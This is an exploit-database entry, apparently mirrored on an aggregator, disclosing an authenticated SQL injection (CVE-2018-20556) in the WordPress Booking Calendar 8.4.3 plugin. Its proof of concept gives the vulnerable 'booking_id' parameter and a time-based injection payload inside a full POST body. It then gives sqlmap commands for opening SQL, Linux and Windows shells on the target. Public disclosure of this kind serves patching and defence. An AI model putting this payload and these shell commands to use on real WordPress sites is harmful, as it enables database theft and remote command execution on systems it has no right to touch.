WordPress Plugin Booking Calendar 8.4.3 - (Authenticated) SQL Injection

🗓️ 14 Feb 2019 00:00:00Reported by B0UGType

exploitdb🔗 www.exploit-db.com👁 3617 Views

Authenticated SQL Injection in WordPress Booking Calendar v8.4.3 plugin allows remote data reading and shell acces

Reporter	Title	Published	Views	Family All 12
0day.today	WordPress Booking Calendar 8.4.3 Plugin - Authenticated SQL Injection Vulnerability	15 Feb 201900:00	–	zdt
Check Point Advisories	WordPress Booking Calendar Plugin SQL Injection (CVE-2018-20556)	28 Nov 202200:00	–	checkpoint_advisories
CVE	CVE-2018-20556	18 Mar 201915:43	–	cve
Cvelist	CVE-2018-20556	18 Mar 201915:43	–	cvelist
exploitpack	WordPress Plugin Booking Calendar 8.4.3 - (Authenticated) SQL Injection	14 Feb 201900:00	–	exploitpack
NVD	CVE-2018-20556	21 Mar 201916:00	–	nvd
OpenVAS	WordPress Booking Calendar Plugin < 8.4.5 SQL Injection Vulnerability	28 Mar 201900:00	–	openvas
Packet Storm	WordPress Booking Calendar 8.4.3 SQL Injection	15 Feb 201900:00	–	packetstorm
Patchstack	WordPress Booking Calendar plugin <= 8.4.5.14 - SQL Injection (SQLi) vulnerability	14 Feb 201900:00	–	patchstack
Prion	Sql injection	21 Mar 201916:00	–	prion

# Exploit Title: Wordpress Booking Calendar v8.4.3 - Authenticated SQL Injection Vulnerability
# Date: 2018-12-28
# Exploit Author: B0UG
# Vendor Homepage: https://wpbookingcalendar.com/
# Software Link: https://wordpress.org/plugins/booking/
# Version: Tested on version 8.4.3 (older versions may also be affected)
# Tested on: WordPress
# Category : Webapps
# CVE: CVE-2018-20556

#I. VULNERABILITY

Authenticated SQL Injection
 
#II. BACKGROUND
'Booking Calendar' WordPress plugin developed by oplugins is a booking system which allows website visitors to check the availability of services and make reservations.

#III. DESCRIPTION
An authenticated SQL Injection vulnerability in the 'Booking Calendar' WordPress plugin allows an attacker to read arbitrary data from the database. 

#IV. PROOF OF CONCEPT
1) Access WordPress control panel.
2) Navigate to the Booking Calendar plugin page.
3) Set up Burp Suite to capture the traffic.
4) Select one of the booking entries and click on the 'Trash Can' button to delete the entry.
5) Within Burp Suite, analyse the POST request and idenitfy the parameter 'booking_id'.
6) The 'booking_id' parameter is vulnerable to the following different types of SQL injection: 
• Boolean based blind injection
• Error based injection
• Time based injection

7) We can perform a time based SQL injection by appending   ) AND SLEEP(100) AND (1=1   after the ID value in the parameter as shown below.
action=TRASH_RESTORE&booking_id=573) AND SLEEP(100) AND (1=1&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=en_US&is_trash=1&wpbc_nonce=99c5ffaa67

Obtaining a shell using sqlmap
-----------------------
• Obtain a SQL Shell
Sqlmap –r post-request.txt –p booking_id --sql-shell

• Obtain a Linux Shell
Sqlmap –r post-request.txt –p booking_id --os-shell

• Obtain a Windows Command Prompt
Sqlmap –r post-request.txt –p booking_id --os-cmd

#V. IMPACT
The vulnerability allows an attacker to read arbitrary data from the database. It is possible to get a remote shell from this vulnerability.
 
#VI. SYSTEMS AFFECTED
WordPress websites running 'Booking Calendar' WordPress plugin version 8.4.3 (older versions may also be affected).
 
#VII. REMEDIATION
Uninstall the plugin until the vulnerability has been fixed by the developer.

#VIII. DISCLOSURE TIMELINE
#December 28, 2018 1: Vulnerability identified.
#December 28, 2018 2: Informed developer of the vulnerability.
#February 14, 2019 3: No communication received back from the developer.

14 Feb 2019 00:00Current

8.8High risk

Vulners AI Score8.8

CVSS 26.5

CVSS 38.8

EPSS0.1246